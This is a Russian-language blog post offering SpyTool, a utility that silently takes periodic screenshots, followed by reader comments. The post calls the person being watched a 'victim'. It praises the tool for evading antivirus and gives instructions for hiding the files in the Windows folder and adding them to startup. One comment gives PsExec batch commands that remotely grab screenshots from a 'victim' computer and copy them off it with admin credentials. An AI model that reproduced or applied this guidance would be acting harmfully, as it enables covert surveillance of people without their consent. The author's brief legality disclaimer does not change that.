SpyTool — следим за пользователями

Недавно ко мне обратился один знакомый, владелец автомойки. Там есть комп, на котором установлена программа учета всей деятельности конторы. Мойка круглосуточная и владелец стал замечать, что временами сотрудники автомойки используют комп не по назначению. Приносят portalble-игрушки, фильмы смотрят и пр. Спрашивает меня — как отследить, чем занимаются сотрудники на компьютере?
Конечно, есть специально разработанные программы для отслеживания действий пользователя на его рабочем месте. Но, во-первых, эти программы стоят денег, а во-вторых, они представляют настолько большой функционал, который не особо нужен, в рамках конкретного вопроса моего знакомого.

Немного пораскинув мозгами, я написал небольшую утилиту, которая в фоновом режиме делает скриншоты экрана с заданным интервалом времени и складывает их в нужную папку. Затем, эти скриншоты можно периодически забирать и анализировать, что происходило на компе в нужный промежуток времени.

Подобных программ мне не жалко, поэтому делюсь со всеми, вдруг кому в хозяйстве пригодится 🙂
Сразу хочу сказать, это первая версия программы и чего-то фантастического в ней нет. Назвал я её SpyTool.
Кратенько перечислю основные особенности:

  • Не требует установки
  • Не определяется антивирусами как вредоносное ПО
  • Создание скриншотов происходит без участия буфера обмена
  • Скриншоты сохраняются в JPEG-файлы
  • Интервал сохранения скриншотов, величина JPEG-компрессии, каталог сохранения задаются в ini-файле.
  • Работает на Windows 2000/XP/Vista/7/8+

Теперь немного подробнее о том, как работает SpyTool.

В архиве вы найдете два файла. Один EXE — это и есть SpyTool. Второй файл с расширением INI — это настройки. Запихиваем оба этих файла на комп жертвы куда-нибудь подальше, например в C:Windows. Имена файлов можно переименовать как вам угодно, главное, чтобы и для EXE и для INI это было одно и тоже имя. Смотрите скриншот ниже:

Далее открываем INI и настраиваем параметры:

  • Interval — это интервал создания скриншотов в секундах. Значения могут быть от 5 до 30 включительно.
  • Folder — каталог для сохранения скриншотов, если при запуске SpyTool этого каталога не окажется, то утилита попробует сама создать эту папку.
  • JPGComression — качество JPEG-файлов. Значения могут быть от 1 до 100 включительно. Чем выше цифра, тем качественнее будет JPEG-файл и тем больше места он будет занимать на жестком диске. На мой взгляд, оптимальным значением является 50, но вы можете поэкспериментировать.

После того, как всё настроили, ярлык на EXE-файл нужно запихнуть куда-нибудь в автозагрузку. Как вы это сделаете, это уже зависит от вашей фантазии. Перезагружаем комп и дело пошло.
INI-файл считывается только один раз при запуске SpyTool, поэтому если вы какие-нибудь параметры измените во время работы, то нужно либо перезагрузить комп либо рестартовать SpyTool: завершить процесс через диспетчер задач и ручками запустить EXE-файл заново.
SpyTool в каталоге назначения создает подкаталоги по дате. Это нужно просто для удобства, если вы не каждый день забираете скриншоты с компа жертвы.

В подкаталогах хранятся сами скриншоты. Названия файлов — это дата + время + специальный символ состояния.

Символ состояния я придумал на будущее. Сейчас он всегда принимает значение N за исключением одного случая. Если пользователь блокирует комп, то делать скриншоты смысла нет, т.к. никакой активности в это время на компьютере не наблюдается. Последний скриншот, перед тем как человек залочил ПК будет идти с символом состояния L. Затем, SpyTool перестает делать скриншоты до тех пор, пока комп не будет разлочен.

И еще парочка особенностей, которые неплохо знать. Во-первых, если к компьютеру подключено несколько мониторов, то SpyTool пока умеет делать скриншоты только с основного монитора. Во-вторых, скриншоты делаются до тех пор, пока место на диске не кончится, т.е. SpyTool пока не умеет самостоятельно следить за свободным местом и при необходимости удалять старые скриншоты.

Скачать последнюю версию SpyTool можно по этой ссылке

Если утилита SpyTool показалась вам интересной и вас есть идеи и предложения по улучшению этой софтины, то оставляйте ваши комментарии или пишите мне на почту macrodmin[собака]gmail.com. В теме письма, пожалуйста, пишите SpyTool.

И последнее! Несанкционированная слежка за кем-либо у нас запрещена законом, поэтому если вы используете утилиту SpyTool, то вы это делаете на свой страх и риск. Имейте это ввиду!

Удачи! 😉

admin

7 комментариев к “SpyTool — следим за пользователями”

Вы можетеоставить отзыв или Обратную ссылку эта запись.
  1. Ulukmyrza - 9 апреля, 2015

    Здравствуйте ! У меня такой вопрос: Если он или она сидит совсем в другом здании и у тебя нету доступа входит туда, там где он или она сидит. Как я заберу скриншот ? Или есть возможность забрать входя соц сеть ???

  2. alexmdv - 12 апреля, 2015

    Забрать можно только если у вас есть удаленный или физический доступ к этому ПК.

  3. Андрей Николаевич - 31 июля, 2015

    Полезная программка, развивайте её.
    1. По поводу законности: достаточно предупредить сотрудника о том, что на работе в рабочее время за его работой ведется контроль, т.е. как в общественных местах — предупреждения о работе видеонаблюдения.
    2. Хорошо бы, чтобы второй монитор тоже скринился.
    3. Интервал скринов полезно увеличить — до 1 раз в 5-10 мин., как минимум.

  4. sergey - 28 октября, 2015

    Да весьма полезная тулза, спасибо

  5. Александр - 9 марта, 2016

    Используем тайм вивер, можно все контролировать он-лайн )))

  6. Юрий - 27 мая, 2016

    Утилита огонь. Пришлось много допиливать чтобы организовать заливку генерируемых изображений на фтп. Хотелось бы чтобы утилита считывала с ini файла переменные среды (например %LOCALAPPDATA% для пути сохранения).

  7. NoName - 13 февраля, 2017

    Зачем все так усложнять?
    Способ палевный. Ниже способ как забирать скриншот удаленно, при этом никаких файлов на компьютере жертвы не накапливается:
    Используем PsExec и любую утилиту снятия скриншота из командной строки (например boxcutter-fs)
    запускаем из батника с компьютера атакующего:
    1. создание скриншота — psexec \%IP% -u %ADMNAME% -p %PAS% -i -c boxcutter-fs c:windows%Filename%.png
    2. переносим с компа жертвы скриншот
    move /Y \%IP%Admin$%Filename%.png \%DESTIP%e$%IP%
    3. задержка на необходимое время между скриншотами — ping -n 1 -w 60000 «Свой IP-адрес» >nul

Нужно войти чтобы оставить комментарий.